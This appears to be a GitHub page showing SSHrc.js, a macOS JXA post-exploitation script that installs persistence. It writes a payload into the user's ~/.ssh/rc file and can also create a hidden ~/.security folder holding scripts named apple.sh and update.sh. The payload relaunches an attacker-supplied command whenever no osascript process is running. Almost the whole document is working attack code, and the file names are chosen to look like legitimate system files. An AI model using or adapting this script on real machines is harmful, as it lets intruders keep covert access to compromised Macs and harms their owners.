-
Notifications
You must be signed in to change notification settings - Fork 27
/
SSHrc.js
116 lines (91 loc) · 3.49 KB
/
SSHrc.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
function SSHrc(userName, persist, hiddenFiles) {
ObjC.import('Foundation')
ObjC.import("Cocoa");
ObjC.import('stdlib')
var app = Application.currentApplication();
app.includeStandardAdditions = true;
var userHome = "/Users/" + userName
var sysVers = app.systemInfo().systemVersion
var output = ""
try {
function writeTextToFile(text, file, overwriteExistingContent) {
var fileString = file.toString()
var openedFile = app.openForAccess(Path(fileString), {
writePermission: true
})
if (overwriteExistingContent) {
app.setEof(openedFile, {
to: 0
})
}
app.write(text, {
to: openedFile,
startingAt: app.getEof(openedFile)
})
app.closeAccess(openedFile)
}
function chmod(value, path) {
let a = $({
NSFilePosixPermissions: value
})
let p = $(path).stringByStandardizingPath
let e = $()
let r = $.NSFileManager.defaultManager
.setAttributesOfItemAtPathError(a, p, e)
return r
}
//PLACEHOLDER: change based on which process you want to monitor for (e.g. osascript)
var payload =
`RUNNING=$(ps ax | grep osascript | wc -l);
if [ "$RUNNING" -lt 2 ]
then
cd ` + userHome + `/.security
./update.sh &
else
exit
fi`
var profile = userHome + `/.security/apple.sh`
function createFolder(path) {
$.NSFileManager.defaultManager.createDirectoryAtPathWithIntermediateDirectoriesAttributesError(path, false, $(), $())
}
var hiddenPath = `` + userHome + `/.security`
isDir = Ref()
var hiddenDirectoryExistsCheck = $.NSFileManager.alloc.init.fileExistsAtPathIsDirectory(hiddenPath, isDir)
if (hiddenFiles == "yes") {
if (hiddenDirectoryExistsCheck == false) {
createFolder(hiddenPath)
}
var payloadPath = userHome + '/.security/apple.sh'
writeTextToFile(payload, payloadPath, true)
var persistPath = userHome + '/.security/update.sh'
writeTextToFile(persist, persistPath, true)
chmod(0o755, payloadPath)
chmod(0o755, persistPath)
profilePath = userHome + '/.ssh/rc'
writeTextToFile(profile, profilePath, false)
output += "Persistence installed at " + userHome + '/.ssh/rc' + " , " + userHome + '/.security/apple.sh' + ",and " + userHome + '/.security/apple.sh'
} else {
profilePath = userHome + '/.ssh/rc'
var payload =
`RUNNING=$(ps ax | grep osascript | wc -l);
if [ "$RUNNING" -lt 2 ]
then
nohup payload > /dev/null 2>&1&
else
exit > /dev/null 2>&1&
fi`
var updatedPayload = payload.replace(/payload/g, persist)
var rcFileexistsCheck = $.NSFileManager.alloc.init.fileExistsAtPath(profilePath)
if (rcFileexistsCheck == "false") {
writeTextToFile(updatedPayload, profilePath, true)
output += "Persistence installed at " + userHome + '/.ssh/rc'
} else {
writeTextToFile(updatedPayload, profilePath, false)
output += "Persistence installed at " + userHome + '/.ssh/rc'
}
}
} catch (error) {
output += error.toString()
}
return output
}